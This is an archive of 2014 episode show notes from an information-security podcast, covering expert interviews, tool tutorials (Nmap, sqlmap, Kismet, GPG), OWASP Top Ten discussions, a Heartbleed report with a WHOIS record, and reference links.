http://www.irongeek.com/i.php?page=videos/derbycon4/t210-around-the-world-in-80-cons-jayson-e-street
http://www.irongeek.com/i.php?page=videos/derbycon4/t216-once-upon-a-time-infosec-history-101-jack-daniel
http://askubuntu.com/questions/529511/explanation-of-the-command-to-check-shellshock
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Marcus J. Carey Interview Part 2 - China, IP, coming cyber war
We finished up our odyssey with Marcus J. Carey this week. We picked his brain about how he feel about China, the coming cyberwar, and what kinds of tools he uses in his toolbox (hint: he doesn't use Kali).
We also talk a bit about the entitlement of people, and what makes folks in poorer countries turn to hacking. We really enjoyed hearing his take on certifications and education. He's a Ruby nut, but suggests that people learn Python. He also talks about how he teaches people about security. The little everyday things that show you do security.
A thought provoking interview that will definitely inspire you to pour yourself into a Python book, or to grab a Raspberry Pi and start learning.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Video: Using GPG and PGP
This month, I wanted to go over a piece of software that seems to give a lot of people problems. In business, there is always a need for sending secure communications, whether because a client asked for it, or because sending sensitive information unencrypted could result in loss of profit, competitve edge, reputation, or all of the above.
This month's tutorial is on setting up PGP or GPG to be able to be more secure when sending emails. I show you commands that allow you to create public/private key pairs, and also discuss the software to be used on either Windows, Linux, and Mac OS.I mentioned signing and encrypting email attachments, and also explain that your headers are still unencrypted, so email metadata tracking is still possible.
Brakeing Security Podcast on PGP/GPG: http://brakeingsecurity.com/pgp-and-gpg-protect-your-data
Windows GPG solution: http://www.gpg4win.org
Mac GPG solution: https://gpgtools.org/
Kali/Linux RNG daemon instructions:
1. apt-get install rngd
2. rngd -r /dev/urandom (should make PGP creation on Kali much faster)
Published on: September 28, 2014
Marcus J. Carey, FireDrillMe, and the Rockstars of Infosec
Marcus J. Carey, a security research and software developer came on to talk to us about FireDrill.me, a tool used to help people work out their Incident Response muscles. He is also the creator of threatagent.com.
Marcus is well known in Security circles, and after we talked to him about FireDrill and ThreatAgent, we got his opinion of other subjects that interested us in the Infosec industry. Marcus is a man of his own mind, and he certainly did not disappoint. Hope you enjoy Part 1 of our conversation with him.
We also asked him about the celebrity that many in the industry face, and how it should be handled by people in the industry.
HoneyDocs - http://www.pcworld.com/article/2048881/honeydocs-lays-irresistible-bait-for-hackers.html
Malcolm Gladwell - http://en.wikipedia.org/wiki/Malcolm_Gladwell
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Mr. Boettcher interviewed Ed Skoudis!
While I'm stuck at work, Mr. Boettcher went to the Austin Hackformers and snagged an interview with Mr. Ed Skoudis, of InGuardians and of the SANS Institute, a top flight training academy. He is to be one of the keynote speakers at DerbyCon this year. He gives us a peek about his keynote, and Mr. Boettcher asks his thoughts on the industry as a whole, SCADA security, Mr. Skoudis' opinion on Infosec as a whole.
Hackformers Austin: http://www.hackformers.org/
Ed Skoudis bio: http://www.sans.org/instructors/ed-skoudis
Bad Guys are Winning - Part 1: link
Bad Guys are Winning - Part 2: link
Bad Guys are Winning - Part 3: link
Bad Guys are Winning - Part 4: link
Bad Guys are Winning - Part 5: link
Netwars: Cybercity - http://www.sans.org/netwars/cybercity
Google Car: http://www.nbcbayarea.com/news/local/Google-to-Test-Self-Driving-Car-Without-Backup-Driver-275033691.html
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Malware, Threat Intelligence, and Blue Team talks at cons -- with Michael Gough Pt.2
We're back with part 2 of our discussion with Michael Gough. Not only do we discuss more about malware, but we also ask Michael's opinion on how commercialized conventions like Black Hat and Defcon have gotten, how good threat intelligence feeds are, and why there aren't more defensive talks at cons.
Michael is currently slated to give a talk on logging at DerbyCon September 24th, 2014 on how logging can help to mitigate malware infections.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Malware, and Malware Sentinel -- with Michael Gough Pt.1
Brian and I managed to get an interview with Michael Gough. If you remember, Michael was on to discuss Malware infections back in February, and we decided it was time to check up on him and his newly named 'Malware Sentinel'. This is part 1, where we discuss some of the recent malware infections, and where you need to look for new file creation, and what you can be looking for in your windows logs that are excellent indicators of malware compromise.
Windows logging cheat sheet - http://sniperforensicstoolkit.squarespace.com/storage/logging/Windows%20Logging%20Cheat%20Sheet%20v1.1.pdf
Malware Management Framework - http://sniperforensicstoolkit.squarespace.com/malwaremanagementframework
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Reconnaissance: Finding necessary info during a pentest
I had a healthy debate with Mr. Boettcher this week about the merits of doing recon for a pentest. Mr. Boettcher is a heavy duty proponent of it, and I see it as a necessary evil, but not one that I consider important. We hash it out, and find some common ground this week.
People search links:
Spokeo - http://www.spokeo.com/
Pipl - https://pipl.com/
Sec Filings site: http://www.sec.gov/edgar/searchedgar/webusers.htm
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Mr. Boettcher made a thing! Setting up a proper Debian install!
Mr. Boettcher made a thing! He created a video that highlights how to install Linux securely in a VM. His next video will be how to setup OWASP's WebGoat to test for vulnerable web apps. He noticed that documentation is a bit sparse, and often contradictory, so he wanted to help other folks who are having issues to get a proper install.
You will need an Network Install ISO of Debian, and you will need either VMware Player or Workstation.
His notes are below... Enjoy!
Secure the Goat #1 - Goat Pen
Create a directory where you will put the VM. We'll call it 'goat'.
Download the Debian Network Install ISO and place it in the 'goat' directory.
Create a 'share' directory inside the goat directory
Place a (test) file in the share directory
In VMware Worstation create a new vm using a Debian ISO and run install
Update the sudoers file
$ su - root
$ update-alternatives --config editor
change to vim.tiny by pressing 2 and enter
$ visudo -f /etc/sudoers
copy the root line and add one for goat user
In order to install vmware tools, we'll need to install these packages
$ sudo apt-get install gcc linux-headers-$(uname -r) make
For the vmware tools install to work properly, these simlinks are required
$ cd /lib/modules/$(uname -r)/build/include/linux
$ sudo ln -s ../generated/utsrelease.h
$ sudo ln -s ../generated/autoconf.h
Insert vmware tools virtual CD
In the workstation menu select vm -> install vmware tools
$ tar -C /tmp/ -zxvf /media/cdrom/VMwarTools...
$ sudo /tmp/VMwareTools.../vmware-install.pl
Show desktop icons
$ gsettings set org.gnome.desktop.background show-desktop-icons true
change resolution in menu at top:
applications/system tools/preferences/system settings/ then 'displays'
in Workstation under vm/settings, set virtual machine shared folder
remove ISO file, take snapshot
Ratproxy and on being a better Infosec Professional
This week, we go into a proxy program called "Ratproxy", discussed it's ins and outs. Plus, Mr. Boettcher and I have a discussion about how we as infosec people should work with developers and IT professionals to provide them training and understanding of security concepts.
https://code.google.com/p/ratproxy/
http://blog.secureideas.com/2012/07/how-to-setup-ratproxy-on-windows.html
Ratproxy icon courtesy of honeytech and flicker
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Introduction to Nmap, Part 2
Here is Part 2 of our video for understanding the basics of Nmap. I discuss some of the logging output, the scripts found in Nmap, and the output that Nmap gives you for reporting or comparison later.
I really did want to go more into the Lua portion of the scripting engine, and perhaps make a simple script, but time constraints halted that. I hope to get more adept at video creation and hopefully editing, to make a more concise video tutorial.
Nmap target specifications: http://nmap.org/book/man-target-specification.html
http://nmap.org/book/nse-usage.html
Explanation of all Nmap scripts: http://nmap.org/nsedoc/
nmap icon courtesy of insecure.org
Published on: August 10, 2014Risk Management discussion with Josh Sokol - Part 2
This week we take some time to talk about risk management with Josh Sokol. This is part 2 from our interview with him last week... We talk some more about Simple Risk from the POV of Risk Management, as well as the licensing/modification of Simple Risk.
Mr. Boettcher and Josh discuss the merits of Qualitative vs. Quantitative Risk Analysis, and which one is better...
We also discuss NIST 800 series guidelines, and how he used those to excellent effect in Simple Risk.
Josh also discusses OWASP, how the advocacy and outreach works and how flexible the organization is.
NIST 800 Series docs - http://csrc.nist.gov/publications/PubsSPs.html
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Interview with creator of Simple Risk, Josh Sokol! (Part 1)
Josh Sokol is on the International OWASP board of directors in addition to being the Information Security Program Owner at National Instruments in Austin, Texas. This week, he sat down with Brakeing Down Security to talk about Simple Risk, his homebrew application that assists people and organizations in managing their business risk, and at a much nicer cost that other GRC applications (it's free!) Check out Part 1 below. If you're at BlackHat 2014 this year, he will be showcasing it at Arsenal!
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Flashback: Sqlmap - a little how-to, and getting your developers involved in using it.
This is a flashback from July 2015.
Mr. Boettcher and I discussed SQLMAP, a tool that can automate the process of pentesting databases and even registries on Windows. We discuss some functions of the program and why developers should get training on these.
Mr. Boettcher and I talk about how Infosec professionals should help to educate QA and Developers to be able to look at their processes and incorporate security testing, using tools like sqlmap in the Software lifecycle.
SQLMAP links
SQLMAP Wiki and more detailed documentation - https://github.com/sqlmapproject/sqlmap/wiki
https://github.com/sqlmapproject/sqlmap
http://hackertarget.com/sqlmap-tutorial/
https://www.owasp.org/index.php/Automated_Audit_using_SQLMap
http://www.binarytides.com/sqlmap-hacking-tutorial/
http://blog.spiderlabs.com/2013/12/sqlmap-tricks-for-advanced-sql-injection.html
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Part 2 with Georgia Weidman!
It only gets better in Part 2 of our Interview with Georgia Weidman, Author, Security Researcher and Creator of the Smartphone Pentesting Framework.
She talks about how people underestimate the mobile platform for pentesting purposes, and we even find out that in addition to Teaching a class on exploit development at BlackHat this year, she's going to be helping a great organization overseas.
We also got her talking about some do's and don'ts of pentesting! ;)
Please enjoy!
Georgia's book on No Starch: http://www.nostarch.com/pentesting
on Amazon.com: http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641 (non-sponsored link)
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Nmap (pt1)
So, I uploaded this little tutorial of nmap, a very nice tool I use on a regular basis, both at home and at work.
I did some basic scans, showed off the command line and the Windows 'Zenmap' version, as well as discussed some regularly used switches.
The next video I do about nmap will discuss more switches, the Nmap Scripting Engine (NSE), and how to format reports and the output nmap provides.
Nmap icon courtesy of livehacking.com
Published on: July 14, 2014Part 1 with Author and Mobile Security Researcher Georgia Weidman!
We have a real treat the next two weeks. Author and Mobile Security Researcher Georgia Weidman, who we also found out will be providing exploit development training at Black Hat this year.
She is the author of an awesome book "Penetration Testing: A Hands-On Introduction to Hacking" (http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641/ref=sr_1_1?ie=UTF8&qid=1405304124&sr=8-1&keywords=georgia+weidman)
She sat down with us over Skype and gave a nice talk about where she came from, and why she wrote the book, and even what she's about to do in the future (that's next week) ;) You'll have to listen next week to find out the awesome trip she's about to take.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Establishing your Information Security Program - Part 2
This is the continuation of our podcast from last week with Phil Beyer.
We started out talking about risk registers, and we end the podcast with a little Q&A about positions in companies (Chief Risk Officer, Chief Data Protection Officer), and whether these positions are useful.
Risk registers - http://en.wikipedia.org/wiki/Risk_register
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Choose your adventure!
Hello valued Listener! I want to do another video, and I thought that you might want to decide which one piece of software I highlight. So here are three options:
1. Nikto
2. Nmap
3. OpenVAS
You can send me your choice to my twitter (@bryanbrake) or to my gmail account ([email protected]).
I will be taking input until 0000 UTC on Sunday July 6th (1800 Saturday 5 July US/Eastern). You can only vote once.
Establishing your Information Security Program - Part 1
Establishing an Information Security program can make or break an organization. So what do you need to get that started?
We have friend of the show Phil Beyer come in and discuss with us the five steps of the creation of an Information Security Program. Join us for Part 1, and next week, we'll finish up with a little Q&A, as well as what a 'risk register' is.
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: June 30, 2014
OWASP Top Ten: 1-5
We finished up the OWASP Top Ten List. We discussed Injection, XSS, and other goodness. Find out what makes the Top 5 so special.
http://risky.biz/fss_idiots - Risky Business Interview concerning Direct Object Reference and First State Superannuation
http://oauth.net/2/ - Great information on OAUTH 2.0.
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: June 23, 2014
OWASP Top Ten: Numbers 6 - 10
As we wade through the morass of the Infosec swamp, we come across the OWASP 2013 report of web app vulnerabilities. Since Mr. Boettcher and I find ourselves often attempting to explain these kinds of issues to people on the Internet and in our daily lives, we thought it would be prudent to help shed some light on these.
So this week, we discuss the lower of the top 10, the ones that aren't as glamorous or as earth shaking as XSS or SQLI, but are gotchas that will bite thine ass just as hard.
Next week is the big ones, the Top 5... all your favorites, in one place!
OWASP Top 10 (2013) PDF: http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf
Costs of finding web defects early (2008): http://www.informit.com/articles/article.aspx?p=1193473&seqNum=6
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: June 16, 2014
Talk with Guillaume Ross - Part 2 (all things cloud)
This is part 2 of our podcast interview with Guillaume Ross, Infosec professional who is well versed with the intricacies of various cloud architectures, whether they are IaaS, PaaS, or SaaS. This part of the podcast discussed how contracts are established, and we ask if smaller cloud providers have a chance against behemoths like Google, Amazon, and Microsoft.
Links brought up during the interview:
Rich Mogull's $500 Epic fail - https://securosis.com/blog/my-500-cloud-security-screwup
Rich Mogull's write up on how the aftermath and investigation - https://securosis.com/tag/cloud+security
Amazon VPC: http://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/VPC_Introduction.html
Azure Endpoints (how-to): http://azure.microsoft.com/en-us/documentation/articles/virtual-machines-set-up-endpoints/?rnd=1
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: June 9, 2014
It all goes in "the cloud" (Part 1)
Brian and I interviewed Mr. Guillaume Ross (@gepeto42), an Information Security professional who helps organizations get themselves situated into cloud based solutions. We get a better understanding of why people would want to put their info into the 'cloud' and how they are different than traditional co-lo and datacenters.
Guillaume's Blog: http://blog.binaryfactory.ca/
AWS (amazon) Security Best Practices WhitePaper: http://aws.amazon.com/whitepapers/aws-security-best-practices/
Amazon EC2 FAQ: http://aws.amazon.com/ec2/faqs/
Microsoft's Azure FAQ:http://azure.microsoft.com/en-us/support/faq/?rnd=1
"cloud computing icon" courtesy of smartdatacollective.com
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: June 1, 2014
Video 2: BONUS!!!! Kismet Video!
As promised, I am posting a video I made explaining how to setup Kismet to do wireless scans.
The only pre-requisites you need are Vmware (it will work the same in VirtualBox), and a VM of Kali linux. The only real difference is the message that asks where the wireless adapter should connect to.
It's my first attempt editing a video, so please be kind
Published on: May 27, 2014Wireless scans with Kismet and Aircrack-ng
Mr. Boettcher and I had a great time this week. We talked all about doing wireless audits for PCI using Kismet and Aircrack-ng, and talked about some capabilities of both.
Alfa AWUS051NH (works in Kali/Backtrack) (no sponsor link): http://www.amazon.com/gp/offer-listing/B002BFO490/ref=dp_olp_0?ie=UTF8&condition=all
kismetwireless.net
Using Karma with a pineapple to fool clients into connecting unencrypted: http://www.troyhunt.com/2013/04/your-mac-iphone-or-ipad-may-have-left.html
Tutorial on hacking various wireless: http://cecs.wright.edu/~pmateti/InternetSecurity/Lectures/WirelessHacks/Mateti-WirelessHacks.htm
Premium content by Bryan! I made a video as well that describes using your wireless dongle to make your Kali Linux into a powerful areal wireless sniffer. http://brakeingsecurity.com/bonus-kismet-video
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: May 26, 2014
PGP and GPG -- protect your data
Sharing information between people and organizations can be a sensitive issue, especially if the information being shared is of mutual importance.
This week, we break down PGP and it's open source cousin GPG. We discuss how last week's podcast about hashing, encoding, and encryption are all bundled up neatly with PGP, and give you some examples of software you can use on Mac, Windows, and Linux.
GPG4Win - http://www.gpg4win.org/
GPG Suite (Mac OS) - https://gpgtools.org/
public PGP key server - pgp.mit.edu
NoStarch Press book: http://www.nostarch.com/pgp.htm
gpg commandline tutorial - http://irtfweb.ifa.hawaii.edu/~lockhart/gpg/gpg-cs.html
Icon courtesy of NoStarch Press
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: May 18, 2014
clearing up some terminology (hashing, encryption, encoding)
Ever heard someone mention AES Encoding, or MD5 Encryption?
Many people in IT, Infosec, and Software development get confused about what Hashing, Encrypting, and Encoding. We hack through the definition forest, looking for that Sequoia of understanding.
We also talk about Symantec's remarks that 'Antivirus is dead' and 'not a moneymaker', and what that means to the industy as a whole.
"Enkrypto" is the program I mentioned in the podcast. It would appear that either s/he fixed it. Still shouldn't be using an 'encoding' method to store SMS if they are of a sensitive nature... The screen shots still clearly show a Base64 encoded SMS, and still show it as a 'secured' message. :( plus, with a the option to allow an encrypted PIN with 4 characters, it would be trivial to crack even an AES encrypted message
Do not buy this app...
https://play.google.com/store/apps/details?id=org.enkrypto.sms
icon courtesy of http://www.differencebetween.info
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: May 13, 2014
Browsing more Securely
This week, we find ways to increase security when browsing the EWW (Evil Wide Web).
We give a shout-out to WhiteHatSec's Aviator browser as a way for everyone to have an eleveated security posture with very little configuration required. And Mr. Boettcher and I talk about some of the plugins we use to make ourselves more secure.
And Mr. Boettcher surprises me with his proclivities toward farmyard animals.
Aviator Browser: https://www.whitehatsec.com/aviator/
Sandboxie: http://www.sandboxie.com/
Browser plugins:
Firefox --- Request Policy: https://addons.mozilla.org/en-US/firefox/addon/requestpolicy/
Google --- Notscript: http://www.dedoimedo.com/computers/google-chrome-notscript.html
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Mandiant 2014 threat report
Mandiant put out their 2014 Threat Report, and we got into all the meaty goodness. From the Syrian Electronic Army, Iran, and China's APT1 and APT12.
Find out if the bad guys are getting smarter, or if we are just making it easier for them? Have a listen and find out.
Mandiant 2014 report (registration required): http://connect.mandiant.com/m-trends_2014
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 13 - 2014 Verizon PCI Report
Since 2006, Verizon has put out their yearly PCI report. We break it down, and discuss the merits of the report.
2014 Verizon Report: www.verizonenterprise.com/resources/reports/rp_pci-report-2014_en_xg.pdf
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 12, Part 2 of our interview with Phil Beyer!
This is Part 2 of our interview with Phil Beyer. We asked him about the difference between mentoring and coaching, and we end the podcast talking about influence, the types of influence and ways to gain influence.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Special Report: Heartbleednado-apoco-geddon
Whois for heartbleed was registered 5 April 2014 by Marko Laasko:
Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: HEARTBLEED.COM
Registry Domain ID: 1853534635_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Update Date: 2014-04-05 15:13:33
Creation Date: 2014-04-05 15:13:33
Registrar Registration Expiration Date: 2015-04-05 15:13:33
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email:@godaddy.com
Registrar Abuse Contact Phone: +1.480-624-2505
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Domain Status: clientRenewProhibited
Domain Status: clientDeleteProhibited
Registry Registrant ID:
Registrant Name: Marko Laakso
Registrant Organization: Codenomicon Oy
Registrant Street: Tutkijantie 4E
Registrant City: Oulu
Registrant State/Province: Oulu
Registrant Postal Code: 90590
Registrant Country: Finland
Registrant Phone: +358.451302656
Registrant Phone Ext:
Registrant Fax: +358.3588340141
Registrant Fax Ext:
Registrant Email:@codenomicon.com
Registry Admin ID:
Admin Name: Marko Laakso
Admin Organization: Codenomicon Oy
Admin Street: Tutkijantie 4E
Admin City: Oulu
Admin State/Province: Oulu
Admin Postal Code: 90590
Admin Country: Finland
Admin Phone: +358.451302656
Admin Phone Ext:
Admin Fax: +358.3588340141
Admin Fax Ext:
Admin Email:
Registry Tech ID:
Tech Name: Marko Laakso
Tech Organization: Codenomicon Oy
Tech Street: Tutkijantie 4E
Tech City: Oulu
Tech State/Province: Oulu
Tech Postal Code: 90590
Tech Country: Finland
Tech Phone: +358.451302656
Tech Phone Ext:
Tech Fax: +358.3588340141
Tech Fax Ext:
Tech Email:
Name Server: NS-697.AWSDNS-23.NET
Name Server: NS-1338.AWSDNS-39.ORG
Name Server: NS-1621.AWSDNS-10.CO.UK
Name Server: NS-473.AWSDNS-59.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
Last update of WHOIS database: 2014-04-13T12:00:00Z
RFC6520 - TLS Heartbeat (co-authored by the the guy Robin Seggelmann) https://tools.ietf.org/html/rfc6520
Slashdot article: http://it.slashdot.org/story/14/04/10/2235225/heartbleed-coder-bug-in-openssl-was-an-honest-mistake
OpenBSD's Theo De Raadt having a rant about OpenSSL: http://it.slashdot.org/story/14/04/10/1343236/theo-de-raadts-small-rant-on-openssl
OpenSSL's malloc issues: http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse and http://www.tedunangst.com/flak/post/heartbleed-vs-mallocconf
Custom Snort rules to detect HeartBleed: http://blog.snort.org/2014/04/sourcefire-vrt-certified-snort-rules_10.html
Intro/Outro Music:
"All This" Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: April 14, 2014
Episode 11, Part 1: Interview with Phil Beyer
This week, we're leaving the Infosec track a bit, but this interview may be more important to being a person's development as a good Infosec person.
We interviewed Mr. Phil Beyer, Director of Information Security for the Advisory Board Company. In addition to being a past president of the Capitol of Texas ISSA Chapter, he co-founded the Texas CISO Council, a regional steering committee composed of security leaders from private industry and the public sector.
He recently gave a talk at Bsides Austin about leadership, and how anyone can be a leader of men. It was very inspiring and something Mr. Boettcher and I thought would be interesting for people in any line of work, not just infosec would benefit from. If you would like to hear his Bsides Austin talk, we have an exclusive audio copy of the talk, which you can find with his slideshare link here: Brakeingsecurity.com
Please leave feedback if you like this, or please feel free to re-tweet/share this elsewhere.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Video1: quick renaming shortcut with Sed
I take a few minutes to explain a quick mass renaming shortcut using sed I use when I have multiple files that I need to rename. I used the example of spaces in filenames, but you can use this to append a name to multiple files.
Another way to easily change files is to use the 'tr' command. You can change a filename from all lowercase to all uppercase letters, or even remove non-printable characters from filenames.
Take a look, please leave feedback. I know there are other ways using awk, perl, and others. This is just another way to do it.
Published on: April 4, 2014Phil Beyer's talk at Bsides Austin
We are pleased to be the only podcast to have audio of the talk Phil Beyer gave at Bsides Austin! It is a very informative talk about leadership, not just in Information Security, but how to be a leader in any field you do.
Breaking Down Security will also carry a 2 part interview with Phil. The first will post on the 6th of April, and the 2nd part will be on the 13th of April.
Phil uploaded the slides of this presentation at Bsides Austin at http://www.slideshare.net/pjbeyer/choose-to-lead.
Brakeing Down Security would like to thank Phil Beyer for his time and generosity.
Published on: March 31, 2014Episode 10: IDS/IPS
We discuss IDS and IPS, why they are needed, and why they get a pass on how easily they are bypassed, and why AV gets all the press...
Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: March 31, 2014
Episode 9: Framework for Improving Critical Infrastructure Cybersecurity
This week, we got into some discussion about frameworks, and the different types of frameworks available (regulatory, "best practice", and process improvement)
We also looked at the new "Framework for Improving Critical Infrastructure Cybersecurity" ratified and released last month.
Does it meet with our high expectations? You'll just have to listen and find out.
http://www.nist.gov/cyberframework/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 8: Why a simple password is not so simple...
Cracking great show this week! Mr. Boettcher and I got all into authentications methods, why they don't always work, and what can we do to make passwords more secure, using Mike Murray's method of 'Passphrases' over passwords...
Finally, we talked about some adventure Mr. boettcher had with a friend's malware infection (it wasn't me, I promise!). He took what we learned from @hackerhurricane (Michael Gough) and is actively doing forensics on it.
http://daleswanson.org/things/password.htm
Malware, Rootkits & Botnets A Beginner's Guide by Christopher Elisan
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 7, Part 2 with Kevin Johnson from SecureIdeas!
This is the Part 2 of our Interview with Kevin Johnson. During our interview, we followed him down the rabbit hole. We learned how to default rulesets in ANY rules based hardware solution sucks. We learned that being a security professional is more than just a fancy title. And finally, we learned that Kevin is a huge fan of Star Wars.
DB Visualizer -- http://www.dbvis.com/
Good article on how homomorphic encryption works:
http://www.americanscientist.org/issues/pub/2012/5/alice-and-bob-in-cipherspace
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
A thought experiment...
I was on LinkedIn this morning and came across this link in the 'Pentesting' group, one of the many groups I have joined there.
It's a series of case studies with a scenario and some questions to be answered in a 5,000 word essay format.
http://resources.infosecinstitute.com/computer-forensics-investigation-case-study/
I thought that in the coming episodes of Brakeing Down Security, it might be interesting to spend a little time breaking down one of these case studies, analyze all the info provided, and give our ideas on how we might go about solving the issue or mitigating what has occurred. Then, we could turn our rabid fans loose on the problem and see if we missed anything, or if someone comes up with a better response (highly likely, as we have many intelligent listeners)
Look for this to happen in the next few weeks.
Published on: March 7, 2014Episode 7, Part 1 - Kevin Johnson of SecureIdeas!
During our SEC542, GIAC Web App Pentesting course, we got the pleasure and honor of sitting down with Kevin Johnson from SecureIdeas on who he is, how Samurai WTF came into being, and why we should be doing licensing for proper ethcial hackers.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 6 - Malware Interview with Michael Gough (Part 2)
This is part 2 of our Interview with Malware researcher Michael Gough. We talk about mobile device malware, and how the Sniper Forensic Toolkit, differs from Tripwire.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
"Infectedpc_primary.jpg is from bugsrepair.com
Published on: February 24, 2014Moon Pcap
I thought I'd try something a little different. I usually use the blogger.com to talk, but I didn't see a reason to waste all this excellent space, so I'll put my post here.
